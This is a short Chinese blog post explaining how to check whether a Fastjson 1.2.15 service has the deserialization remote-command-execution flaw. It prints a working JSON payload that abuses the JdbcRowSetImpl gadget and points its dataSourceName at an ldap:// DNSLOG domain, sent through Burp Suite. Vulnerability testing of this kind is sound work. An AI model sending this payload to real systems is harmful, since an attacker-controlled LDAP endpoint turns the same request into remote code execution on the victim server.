利用DNSLOG测试Fastjson远程命令执行漏洞

时间:2022-07-22
本文章向大家介绍利用DNSLOG测试Fastjson远程命令执行漏洞,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

  由于内容比较简单,我直接贴图,怕我自己忘了。

测试Fastjson版本号:1.2.15

  直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。

  payload:
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://6v0jfv.dnslog.cn
",
        "autoCommit":true
    }
}

  若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。

如有错误,请及时指正,谢谢!

随机文章
Javascript知识点必读
最近更新